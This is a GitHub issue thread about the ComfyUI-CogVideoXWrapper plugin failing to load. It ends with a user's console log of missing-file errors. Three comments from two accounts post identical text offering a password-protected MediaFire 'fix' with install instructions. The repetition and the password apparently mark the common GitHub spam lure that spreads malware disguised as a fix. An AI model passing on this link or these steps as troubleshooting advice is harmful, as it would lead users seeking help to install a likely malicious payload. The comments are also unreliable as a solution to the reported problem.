### ISSUE TITLE
cannot load cogvideox

### ISSUE THREAD

**Issue by yasis1** [kijai/ComfyUI-CogVideoXWrapper#15]
i am unable to load the plugin to comfyui, i have also seen all the solution that was in the post and i have tried it all, but no matter it will not load, i need help.

![001](https://github.com/user-attachments/assets/11bfbe7f-2082-442e-96cb-1d7379803da5)
![002](https://github.com/user-attachments/assets/297c904e-2c70-4939-93bf-c763a1e2947f)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tushar53471** [comment]
ComfyUI/python_embeded -folder and running this command:
python.exe -m pip install -U diffusers i have update that python_embeded but i didnt solve that  
To see the GUI go to: http://127.0.0.1:8188
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/photoswipe-lightbox.esm.min.js
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/photoswipe.min.css
FETCH DATA from: C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager\extension-node-map.json [DONE]
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/pickr.min.js
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/classic.min.css
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/model-viewer.min.js
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/juxtapose.min.js
C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/juxtapose.css
[ERROR] An error occurred while retrieving information for the 'Generate Stable Diffsution Prompt With LLM' node.
Traceback (most recent call last):
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 563, in get_object_info
    out[x] = node_info(x)
             ^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 530, in node_info
    info['input'] = obj_class.INPUT_TYPES()
                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\AssistantNodes.py", line 10, in INPUT_TYPES
    data = load_config()
           ^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\utils.py", line 52, in load_config
    with open(os.path.join(my_path, "config.yaml"), 'r') as file:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'C:\\AI\\ComfyUI_windows_portable\\ComfyUI\\custom_nodes\\comfyui-llm-assistant\\config.yaml'

[ERROR] An error occurred while retrieving information for the 'Translate Text With LLM' node.
Traceback (most recent call last):
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 563, in get_object_info
    out[x] = node_info(x)
             ^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 530, in node_info
    info['input'] = obj_class.INPUT_TYPES()
                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\AssistantNodes.py", line 115, in INPUT_TYPES
    data = load_config()
           ^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\utils.py", line 52, in load_config
    with open(os.path.join(my_path, "config.yaml"), 'r') as file:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'C:\\AI\\ComfyUI_windows_portable\\ComfyUI\\custom_nodes\\comfyui-llm-assistant\\config.yaml'

[ERROR] An error occurred while retrieving information for the 'Chat With LLM' node.
Traceback (most recent call last):
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 563, in get_object_info
    out[x] = node_info(x)
             ^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\server.py", line 530, in node_info
    info['input'] = obj_class.INPUT_TYPES()
                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\AssistantNodes.py", line 221, in INPUT_TYPES
    data = load_config()
           ^^^^^^^^^^^^^
  File "C:\AI\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-llm-assistant\utils.py", line 52, in load_config
    with open(os.path.join(my_path, "config.yaml"), 'r') as file:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: 'C:\\AI\\ComfyUI_windows_portable\\ComfyUI\\custom_nodes\\comfyui-llm-assistant\\config.yaml'

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

Error. No naistyles.csv found. Put your naistyles.csv in the custom_nodes/ComfyUI_NAI-mod/CSV directory of ComfyUI. Then press "Refresh".
                  Your current root directory is: C:\AI\ComfyUI_windows_portable\ComfyUI

[]
[]
